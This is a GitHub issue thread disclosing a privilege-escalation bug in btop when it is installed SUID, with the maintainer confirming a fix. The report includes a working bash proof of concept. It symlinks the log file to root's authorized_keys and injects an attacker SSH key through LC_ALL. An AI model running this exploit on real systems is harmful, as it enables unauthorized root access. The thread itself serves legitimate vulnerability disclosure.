### ISSUE TITLE
[BUG] Should drop privileges before writing to files

### ISSUE THREAD

**Issue by zachhanson94** [aristocratos/btop#133]
**Describe the bug**

If btop is installed SUID on the system, any other user that can execute btop can write any file as the privileged user. This effectively gives them code execution abilities, in the privileged users context, in most cases. Below is a PoC for how a user could use this bug to elevate privileges when btop is installed SUID root. It should be noted, though, that the process can be done against whichever user is the owner of btop when it is SUID.

**To Reproduce**

```bash
#!/bin/bash

# Make sure the config directory exists.
mkdir -p ~/.config/btop

# Remove any existing log.
rm -f ~/.config/btop/btop.log

# Symlink btop.log to the file you want to write to.
ln -s /root/.ssh/authorized_keys ~/.config/btop/btop.log

# I chose to use the LC_ALL environment variable since that gets written to the log.
# This must end in UTF8 to pass the validation checks in the code.
export LC_ALL=$'\n\nssh-rsa ...SNIP... attacker@somewhere\n\nUTF8'

# Start btop to trigger the write.
btop

echo "File should have been written."

# Best part is it doesnt clobber the existing data so you can just add on to existing files.
# Another possible target could be any scripts that get executed as root/targeted user.
```

**Expected behavior**

Privileges should be dropped to the real user id before performing file write operations.

**Screenshots**

[If applicable, add screenshots to help explain your problem.]

**Info (please complete the following information):**
 - btop++ version: 1.0.20
 - Binary: self compiled
 - (If compiled) Compiler and version: g++ 11.1.0
 - Architecture: x86_64
 - Platform: Linux
 - (Linux) Kernel: 5.4.0-89-generic

**Additional context**

> contents of `~/.config/btop/btop.log`

In the case of the PoC from above:
 the victims authorized_keys + attackers public key  hopefully :)

**Comment by aristocratos** [comment]
@zachhanson94 
Great find! And my bad in not recognizing a common security issue.

Would this be solved by simply comparing current real user/group with the user/group for the canonical path of the written file? Or is it necessary to actually drop privileges at every write?

**Comment by zachhanson94** [comment]
I would drop privileges and let the OS handle the ACL stuff. Trying to check it yourself is just a recipe for more bugs imo. The ideal solution is to just drop privileges at the beginning and only elevate them when you need to perform a privileged action. That way any other bugs that might allow for file injection or even code execution wouldnt automatically be done in the privileged users context. But if im being honest, although im a software engineer myself I am much better at exploiting issues like this than I am at ensuring these issues arent exploitable. I'm sure there are others in the community that can give better guidance than I can on the matter.

I would also suggest just making a note of the potential security issues associated with installing SUID, especially in the meantime before a fix is out, but also just in general. I feel like a project like this especially will attract a lot of linux noobs, especially with the rapid growth of linux lately, and they might just see the pretty TUI and not consider what the implications of some of their actions are.

**Comment by aristocratos** [comment]
@zachhanson94 
> I would drop privileges and let the OS handle the ACL stuff. Trying to check it yourself is just a recipe for more bugs imo...

Agreed.

Fixed in [v1.0.21](https://github.com/aristocratos/btop/releases/tag/v1.0.21) :)
